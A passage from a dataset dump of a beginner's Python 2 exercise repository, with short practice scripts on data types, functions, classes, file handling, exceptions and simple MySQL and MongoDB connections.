"content_id": "4ebd70c1d563a55bcd29a249b444b52da136ac68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num12.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10.0\nb=long(a)\nprint b, type(b)" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.6333333253860474, "avg_line_length": 19.33333396911621, "blob_id": "92e41d2a17690b77a2bc3aeda2f47a51db1483b2", "content_id": "c1be63d052eb29e7a40bacb0b1a96cd502e56f87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 60, "license_type": "no_license", "max_line_length": 25, "num_lines": 3, "path": "/Day2/List/List1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=tuple(a)\nprint b,type(b),type(a)" }, { "alpha_fraction": 0.655339777469635, "alphanum_fraction": 0.6650485396385193, "avg_line_length": 24.75, "blob_id": "ba3d462df84911df3fff11717e413d89a74727c1", "content_id": "814300e5912d86036f9b8561dd357f335352ee90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 206, "license_type": "no_license", "max_line_length": 52, "num_lines": 8, "path": "/Day2/Function/Fun8.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def printme(name,age):\n \"This prints a passed string into this function\"\n print \"name : %s\"%name\n print \"age : %d\"%age\n return;\n\n# Now you can call printme function\nprintme(name='savan',age=25)\n" }, { "alpha_fraction": 0.5845070481300354, "alphanum_fraction": 0.5845070481300354, "avg_line_length": 16.875, "blob_id": "e0d11640d9551cf38c4c6fe4cd90749420a1589d", "content_id": "aa2878989c0b6c009040230fa8df54722596057c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 142, "license_type": "no_license", "max_line_length": 26, "num_lines": 8, "path": "/Day4/overriding/overriding.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class papa:\n def show(self):\n print \"show papa\"\nclass child(papa):\n def show(self):\n print \"show child\"\nc=child()\nc.show()" }, { "alpha_fraction": 0.5964912176132202, "alphanum_fraction": 0.6374269127845764, "avg_line_length": 13.25, "blob_id": "e1005307d1df48f96e57706664e2700efcef9024", "content_id": "f3e9ef442d0a44931ff4247397de3630c6791e9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 171, "license_type": "no_license", "max_line_length": 59, "num_lines": 12, "path": "/Day2/Number/Num21.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from math import fabs\na=50L\n'''fabs(x) used as float value.its gives you float value'''\nprint fabs(a)\n\na=-50.1\n'''abs(x)'''\nprint fabs(a)\n\na=50\n'''abs(x)'''\nprint fabs(a)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 28, "blob_id": "85e9b83c927be8cece9649a8889935fffa4a4ab1", "content_id": "b06ae0298feac71d269350fea5754c19a51bdec8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 57, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/Day5/Consol/Consol1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=input(\"Enter you number value : \")\nprint \"welcome : \",a" }, { "alpha_fraction": 0.5076923370361328, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 25.200000762939453, "blob_id": "d61bc3e5cbfc80d077f56ca35a91cf9735efa480", "content_id": "f8fa0601f93a311d59ee44733adb11f04397b836", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 53, "num_lines": 5, "path": "/Day2/Dictionary/Dict23.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456,'id':\"102\"}\nb={'company':\"jsi\"}\na.update(b)\nprint a.get('id')\nprint a.get('hey','hello')" }, { "alpha_fraction": 0.6086956262588501, "alphanum_fraction": 0.695652186870575, "avg_line_length": 7, "blob_id": "ae2e969cf68afabd1e6fc678195e23680526b266", "content_id": "e66f0c443fdb204f9691cb9b19a38b630907347a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23, "license_type": "no_license", "max_line_length": 10, "num_lines": 3, "path": "/Day2/Number/Num3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10\nb=float(a)\nprint b" }, { "alpha_fraction": 0.5892857313156128, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 12.75, "blob_id": "6e7b1e30f41ed8e3a714caceb9999526a350387b", "content_id": "0a5ea93f380e7c04801557936a612c95f91a1f55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 24, "num_lines": 4, "path": "/Day5/In_Op/Io7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=open(\"myfile.txt\",\"r\")\nb=a.read(5)\nprint b\na.close()\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.692307710647583, "avg_line_length": 9.600000381469727, "blob_id": "3f07abeda4a52169eeeac9a8534cee29369c2799", "content_id": "dc4317259a0cd8137f4768761a38649affb21734", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 15, "num_lines": 5, "path": "/Day3/B/C.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from B import A\n\nA.Amodule()\nA.Bmodule()\nA.Cmodule()" }, { "alpha_fraction": 0.6748466491699219, "alphanum_fraction": 0.6748466491699219, "avg_line_length": 19.375, "blob_id": "7893306e73c574237392a02eae7ec1c5cb0ae5a1", "content_id": "4d1d3442b51d9f67469b36247c052a6f5064365e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 163, "license_type": "no_license", "max_line_length": 31, "num_lines": 8, "path": "/Day5/Database/mysqlDB/Db8.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import mysql.connector\nmydata=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\",\n database=\"SAVANJI\"\n )\nprint mydata\n" }, { "alpha_fraction": 0.5506607890129089, "alphanum_fraction": 0.5506607890129089, "avg_line_length": 12.352941513061523, "blob_id": "fd5fdd2b2dee2fb3572c49168620763d06c87a59", "content_id": "815b7a1d6345dab465074c74d339646ec88c56d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 227, "license_type": "no_license", "max_line_length": 23, "num_lines": 17, "path": "/Day4/Inheritance/Inher.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class A:\n def myprint(self):\n print \"myprint\"\nclass B(A):\n def display(self):\n print \"display\"\n\nclass C(A):\n def show(self):\n print \"show\"\n\nc=C()\nb=B()\nc.myprint()\nb.display()\nb.myprint()\nc.show()\n" }, { "alpha_fraction": 0.4655172526836395, "alphanum_fraction": 0.6206896305084229, "avg_line_length": 28.5, "blob_id": "42a5d11f3461627cef48e64b72c8e68440319ac5", "content_id": "53273f4a02e1bf4e4011d502bfc8f0d59a29b46c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "no_license", "max_line_length": 42, "num_lines": 2, "path": "/Day2/Dictionary/Dict5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456}\nprint a['name']" }, { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 19.18181800842285, "blob_id": "e9bd9cc03c2dc33ce86847f6526dcc083b855be7", "content_id": "fb62cf9fc2b0d7ab351c5405e50cf24f9eab4f62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 221, "license_type": "no_license", "max_line_length": 32, "num_lines": 11, "path": "/Day5/Database/mysqlDB/Db7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import mysql.connector\nmydata=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\"\n )\ncursor=mydata.cursor()\ncursor.execute(\"SHOW DATABASES\")\n\nfor dfetch in cursor:\n print dfetch" }, { "alpha_fraction": 0.5925925970077515, "alphanum_fraction": 0.6402116417884827, "avg_line_length": 17.899999618530273, "blob_id": "9ad7534301131874294b9fe545117415b6696638", "content_id": "7cd71a0d24abebf2101fd8889986320b75e4d90e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "no_license", "max_line_length": 52, "num_lines": 10, "path": "/Day2/Function/Fun10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def printme(a,*b):\n \"This prints a passed string into this function\"\n print a\n for c in b:\n print c\n \n\n# Now you can call printme function\nprintme(50)\nprintme(1,20,30,40)\n" }, { "alpha_fraction": 0.5384615659713745, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 12, "blob_id": "9ac4ffa655d774b4cf6aea8d89bf3c86e4b58905", "content_id": "3d9faa922d87965f2a14109813c5eba37f4d3aa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 13, "license_type": "no_license", "max_line_length": 12, "num_lines": 1, "path": "/README.md", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "# Python_2.x\n" }, { "alpha_fraction": 0.6578947305679321, "alphanum_fraction": 0.6578947305679321, "avg_line_length": 18.5, "blob_id": "803110e1a6dfc17bb9dc5cd217511e7249120a71", "content_id": "5b8e18c94b33bb8a7b2378a3931960fd558d0c50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 22, "num_lines": 2, "path": "/Day2/String/String9.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello world\"\nprint \"c:\\\\etc\\init.d\"" }, { "alpha_fraction": 0.53125, "alphanum_fraction": 0.625, "avg_line_length": 10, "blob_id": "f421d67fb35f6a99f3d132a89ac3affdb58727c2", "content_id": "1a841845f010358ea931562c5596f1bed8d6d6b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num11.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10.0\nb=int(a)\nprint b, type(b)" }, { "alpha_fraction": 0.5897436141967773, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 12.333333015441895, "blob_id": "11c9a83f9cc088c22784d86596a2dae8ef5cab4e", "content_id": "07b0e3621f90f2de61346022a9cbd4b1c024dc93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 22, "num_lines": 3, "path": "/Day2/String/String5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello world\"\n\nprint a[:6] + 'python'" }, { "alpha_fraction": 0.7119565010070801, "alphanum_fraction": 0.7228260636329651, "avg_line_length": 17.5, "blob_id": "cdd9e97608d99af1ac5db4381175faf1e372b955", "content_id": "fabb05424c410cfab1c1ad526d55e922d9464577", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 184, "license_type": "no_license", "max_line_length": 36, "num_lines": 10, "path": "/Day2/String/String1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from string import capitalize, lower\na=\"hello world\"\nprint capitalize(a)\nprint a.center(15,'s')\nprint a.title()\n#print min(a)\nprint max(a)\na=\" a HELLO DEAR\"\nprint lower(a)\nprint min(a)" }, { "alpha_fraction": 0.7804877758026123, "alphanum_fraction": 0.8211382031440735, "avg_line_length": 30, "blob_id": "5ed3d359b4c082ad0fe347eb3756e31d8e19b6d2", "content_id": "fc0cb4704c9092237e21b3ed08dceefda40a9020", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 123, "license_type": "no_license", "max_line_length": 58, "num_lines": 4, "path": "/Day5/Database/MongoDb/Mongo2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import pymongo\nmyclient=pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb=myclient[\"mydbtest\"]\nprint myclient.mydbtest" }, { "alpha_fraction": 0.4714285731315613, "alphanum_fraction": 0.4952380955219269, "avg_line_length": 12.933333396911621, "blob_id": "96a42f2076abeeff2ebc791c6819bc2a82bcb27a", "content_id": "ae98f36d5ecd909ba9c43f2e2189e0059f1653f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 210, "license_type": "no_license", "max_line_length": 21, "num_lines": 15, "path": "/Day3/Module/Area/area.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def circle(r): \n print 3.14*r*r \n return \n \ndef square(l): \n print l*l \n return \n \ndef rectangle(l,b): \n print l*b \n return \n \ndef triangle(b,h): \n print 0.5*b*h \n return " }, { "alpha_fraction": 0.6285714507102966, "alphanum_fraction": 0.6857143044471741, "avg_line_length": 11, "blob_id": "d18099abbe91504808f6e7faeaea5aec9aeb5d76", "content_id": "1bbc669bfcceb65995d47b72f42aa7a191e4e9e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num6.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10L\nb=complex(a)\nprint b, type(b)" }, { "alpha_fraction": 0.574999988079071, "alphanum_fraction": 0.574999988079071, "avg_line_length": 9.25, "blob_id": "ac89c013817d9ddf443f95fd8e75c613b40793f6", "content_id": "562f337198e37b741093af1ba3dcfc4e7692319d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40, "license_type": "no_license", "max_line_length": 13, "num_lines": 4, "path": "/Day4/Class/Cls3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class sk:\n a=\"hello\"\ns=sk()\nprint s.a" }, { "alpha_fraction": 0.6194690465927124, "alphanum_fraction": 0.6283186078071594, "avg_line_length": 18, "blob_id": "2383891845c2ac574c7b82e05773f52457677ba3", "content_id": "abd3e8954064c53d326b5e0f0b14b083c75b9687", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 113, "license_type": "no_license", "max_line_length": 35, "num_lines": 6, "path": "/Day5/In_Op/OS/os1/os.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import os\n#a=os.mkdir(\"os1/a\")\n#b=os.getcwd()\nos.open(\"hey.txt\",\"r \")\nb=os.rename(\"hey.txt\", \"hello.txt\")\nprint b" }, { "alpha_fraction": 0.5098039507865906, "alphanum_fraction": 0.6274510025978088, "avg_line_length": 11.75, "blob_id": "b953d048cebbabd769f136898cd85115c27ca3ca", "content_id": "4154f91c7c07d36c94c8f357adec2841c24e1faa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 25, "num_lines": 8, "path": "/Day2/List/List12.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=[\"py\",'hello']\na.append(b)\nprint a\n\nprint a.count(10)\na.extend(b)\nprint a\n" }, { "alpha_fraction": 0.5945945978164673, "alphanum_fraction": 0.5945945978164673, "avg_line_length": 18, "blob_id": "cc1fcc008d11d9c0ca0717628359086fc21bebd1", "content_id": "60134c711b4508d0b2acce941ea14a9f9422423d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37, "license_type": "no_license", "max_line_length": 26, "num_lines": 2, "path": "/Day3/Module/Phone/MsgFile.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def msg():\n print \"I'm Pots Phone\"" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.6984127163887024, "avg_line_length": 14.625, "blob_id": "6ae432edbac35d096ea76e66f5fd002be16b0930", "content_id": "4d3fbe53bbd4c888356541a3589d25e18a404169", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 126, "license_type": "no_license", "max_line_length": 39, "num_lines": 8, "path": "/Day2/Number/Num1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from math import log, log10, sqrt, modf\na=10\nprint log(a)\nprint log10(a)\na=100.2\nprint sqrt(a)\nprint pow(a, 2)\nprint modf(a)\n\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.593406617641449, "avg_line_length": 22, "blob_id": "29974b229902cfee9d44574861129454969723e6", "content_id": "0da2115400c6a391d8d1292289925815d1e78afa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 53, "num_lines": 4, "path": "/Day2/Dictionary/Dict1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456,'id':\"102\"}\nb={'company':\"jsi\"}\na.clear()\nprint a" }, { "alpha_fraction": 0.5526315569877625, "alphanum_fraction": 0.5526315569877625, "avg_line_length": 15.428571701049805, "blob_id": "415a15a98f4b59f65644b825b47d227af1d70044", "content_id": "0a9175c3dfcf6f31ac6115177057c5ced1090154", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114, "license_type": "no_license", "max_line_length": 31, "num_lines": 7, "path": "/Day5/In_Op/Io3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n a=open(\"myfile.txt\",\"r\")\n b=a.read()\n print b\nexcept:\n print \"file going to close\"\n a.close()" }, { "alpha_fraction": 0.6222222447395325, "alphanum_fraction": 0.644444465637207, "avg_line_length": 17.85714340209961, "blob_id": "246bd662e24e53dba3df6ab0458fb2596352ec55", "content_id": "5370f4285f1016f862ba0dae5716beac9c073fee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 135, "license_type": "no_license", "max_line_length": 50, "num_lines": 7, "path": "/Day5/Exception/Excep3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n a=10/0\n print \"exception occur\"\nfinally :\n print \"this statement is raising an exception\"\n#else:\n print \"welcome\" " }, { "alpha_fraction": 0.6176470518112183, "alphanum_fraction": 0.6764705777168274, "avg_line_length": 10.666666984558105, "blob_id": "9db9dc6bec011d8eeaf53b392f20be21e0b8d46f", "content_id": "018db577bfde14030168c73239834c50a9ba548d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10\nb=complex(a)\nprint b, type(b)" }, { "alpha_fraction": 0.3529411852359772, "alphanum_fraction": 0.5686274766921997, "avg_line_length": 9.399999618530273, "blob_id": "c7709ab7a0561919959135b9bb417c6ac7fad436", "content_id": "2b06714006db811a4a3df3d0f8f4f046e298b725", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 25, "num_lines": 5, "path": "/Day2/List/List5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=\"py\"\n\ndel a [1]\nprint a" }, { "alpha_fraction": 0.5121951103210449, "alphanum_fraction": 0.6097561120986938, "avg_line_length": 13, "blob_id": "8086ae8b831a046a8fba9f137a27735e3182f854", "content_id": "9875dd5b31c1a8f7c8158b04ef5ced7506aa58c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41, "license_type": "no_license", "max_line_length": 19, "num_lines": 3, "path": "/Day2/Function/Fun4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def fun1(a):\n print \"hello\",a\nfun1(10)" }, { "alpha_fraction": 0.48500001430511475, "alphanum_fraction": 0.48500001430511475, "avg_line_length": 17.272727966308594, "blob_id": "ee034608bb398dc4a1d99bf96607c429bbb3dff4", "content_id": "84438daf81330e6e66a2cb24e3c0f5d7b2775011", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "no_license", "max_line_length": 37, "num_lines": 11, "path": "/Day5/Exception/Excep9.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n \n try:\n a=open(\"test.txt\",\"r\")\n a.write(\"hey this is python\")\n finally:\n \n print \"file is closed\"\n a.close()\nexcept:\n print \"file can not be read\"" }, { "alpha_fraction": 0.40740740299224854, "alphanum_fraction": 0.5925925970077515, "avg_line_length": 12.25, "blob_id": "3938056019fdf573559dfe97b37182e49ca34b86", "content_id": "b6eba494d38e607fb8606d49eb3d876fb6a13874", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 54, "license_type": "no_license", "max_line_length": 25, "num_lines": 4, "path": "/Day2/List/List10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=\"py\"\na.append(b)\nprint a\n\n" }, { "alpha_fraction": 0.6470588445663452, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 10.666666984558105, "blob_id": "7653ef07e560630f18424a34aa9257686b4850eb", "content_id": "fa79e59b49657c31bb393715e4bfd6a00e3bced1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34, "license_type": "no_license", "max_line_length": 14, "num_lines": 3, "path": "/Day2/String/String4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello\"\nb=\"python\"\nprint a+b" }, { "alpha_fraction": 0.5972222089767456, "alphanum_fraction": 0.7361111044883728, "avg_line_length": 11.166666984558105, "blob_id": "c0040e6e536e62d08ee66c20f6bfad0e509463f7", "content_id": "904880e497de98a3a3591734a1e4ad5a1700c3f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 18, "num_lines": 6, "path": "/Day3/Module/Area/area2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from area import *\n\ncircle(10)\nsquare(20)\nrectangle(20,20)\ntriangle(5,2)" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.6233766078948975, "avg_line_length": 10.142857551574707, "blob_id": "1622c6996977a10e3faa1d9ab26e1d4365ee6ead", "content_id": "1d2202d357cbd6621a1737e3ac3590786b0f4256", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 77, "license_type": "no_license", "max_line_length": 17, "num_lines": 7, "path": "/Day2/Function/Fun15.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "b=20\ndef fun(a):\n print a\n return a\na=fun(10)\nprint \"outside\",b\nprint a" }, { "alpha_fraction": 0.5765765905380249, "alphanum_fraction": 0.5765765905380249, "avg_line_length": 17.66666603088379, "blob_id": "14a0c086f73145a56b38d6731a7acf85c9d25217", "content_id": "27465b87ae67ce63e17a766d0b4c440fb3f8a08e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111, "license_type": "no_license", "max_line_length": 31, "num_lines": 6, "path": "/Day5/In_Op/Io2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n a=open(\"my.txt\",\"w\")\n a.write(\"hello python\")\nexcept:\n print \"file going to close\"\n a.close()" }, { "alpha_fraction": 0.5724138021469116, "alphanum_fraction": 0.5724138021469116, "avg_line_length": 13.600000381469727, "blob_id": "28c47b82c5916530522dc25e7acfa5a7c438a800", "content_id": "b8324538ab7bd74e6ba1a8dad9d9f6898a5d50c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 23, "num_lines": 10, "path": "/Day4/Inheritance/Inher3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class A:\n def myprint(self):\n print \"myprint\"\nclass B(A):\n def display(self):\n print \"display\"\n\nb=B()\nb.display()\nb.myprint()" }, { "alpha_fraction": 0.698924720287323, "alphanum_fraction": 0.698924720287323, "avg_line_length": 22.375, "blob_id": "0fba073bdc01ecb25f2b048416ccf7a670bf2ade", "content_id": "e50675f0a4d583ddf1e147960c2b9dbdb2ca2e04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186, "license_type": "no_license", "max_line_length": 39, "num_lines": 8, "path": "/Day5/Database/mysqlDB/Db3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import mysql.connector\nmydb=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\" \n )\ncursor=mydb.cursor()\ncursor.execute(\"CREATE DATABASE vikas\")" }, { "alpha_fraction": 0.2916666567325592, "alphanum_fraction": 0.5416666865348816, "avg_line_length": 8.600000381469727, "blob_id": "1124218bc173d68445822fd7bf374cfd402fd40a", "content_id": "004ac92200f56d04a576e1478d384baa3272088a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48, "license_type": "no_license", "max_line_length": 18, "num_lines": 5, "path": "/Day2/Tuple/Tup7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nb=(200,500)\n\nc=a + b\nprint c\n" }, { "alpha_fraction": 0.7540983557701111, "alphanum_fraction": 0.7704917788505554, "avg_line_length": 14.5, "blob_id": "b76907379e03f93cbc6700ef5526c2789fda5519", "content_id": "6cc1e9f1a725888ca8d6df9e6a3874dbfb071c3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 61, "license_type": "no_license", "max_line_length": 41, "num_lines": 4, "path": "/com/sk/mod1/mfile.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from com.sk.sfile1 import vikas, adisplay\n\nvikas()\nadisplay()" }, { "alpha_fraction": 0.4444444477558136, "alphanum_fraction": 0.6222222447395325, "avg_line_length": 14.333333015441895, "blob_id": "dcd3211618e9a751ab49900568584979b75a2730", "content_id": "d9edbc6c49ca3064406b246e08c2db5f181f41fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45, "license_type": "no_license", "max_line_length": 18, "num_lines": 3, "path": "/Day2/Tuple/Tup3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nprint a[0:3]\nprint type(a)" }, { "alpha_fraction": 0.6116504669189453, "alphanum_fraction": 0.708737850189209, "avg_line_length": 13.714285850524902, "blob_id": "6856032232787c16247bd8430a055f6864344d53", "content_id": "dc10387c0c48dd0b034e993c8898d32141c3db5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 103, "license_type": "no_license", "max_line_length": 33, "num_lines": 7, "path": "/Day2/Number/Num31.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from math import log, log10, sqrt\na=10\nprint log(a)\nprint log10(a)\na=100\nprint sqrt(a)\nprint pow(a, 2)\n" }, { "alpha_fraction": 0.6060606241226196, "alphanum_fraction": 0.6060606241226196, "avg_line_length": 7.5, "blob_id": "c9e13835353310e52091a56b91c1cd1b493c8d3a", "content_id": "0ac62bbfe03ca8505229d1b079ee75f0d1b5c886", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33, "license_type": "no_license", "max_line_length": 9, "num_lines": 4, "path": "/Day4/Class/Cls2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class sk:\n pass\ns=sk()\nprint s" }, { "alpha_fraction": 0.6730769276618958, "alphanum_fraction": 0.6730769276618958, "avg_line_length": 30.200000762939453, "blob_id": "44eb8063f9f0344eb2f99d18b6142f2e51dcff5f", "content_id": "01b8f9b389ebf534b756bc424dcf60715c7b5633", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 156, "license_type": "no_license", "max_line_length": 41, "num_lines": 5, "path": "/Day5/In_Op/Io9.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=open(\"new file.txt\",\"w+\")\nprint \"please write a file: \"\na.write(raw_input(\"Enter You String : \"))\nprint \"file is written\"\nprint \"file is close\",a.close()\n" }, { "alpha_fraction": 0.29487180709838867, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 8.875, "blob_id": "89d5f6f3ae2e3cd088a2bf8296083901eeaa9be3", "content_id": "2be4649df8cc08ee4f6fc4f861d3f4ada6a46ff2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 78, "license_type": "no_license", "max_line_length": 18, "num_lines": 8, "path": "/Day2/Tuple/Tup4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nb=20\n\nprint a[0:3]\na=[10,20,30,'hey']\nb=20\na[0]=500\nprint a" }, { "alpha_fraction": 0.5164835453033447, "alphanum_fraction": 0.5604395866394043, "avg_line_length": 14.333333015441895, "blob_id": "77d6a7edbeb05cd124387cb266ed8ec3a9a63a15", "content_id": 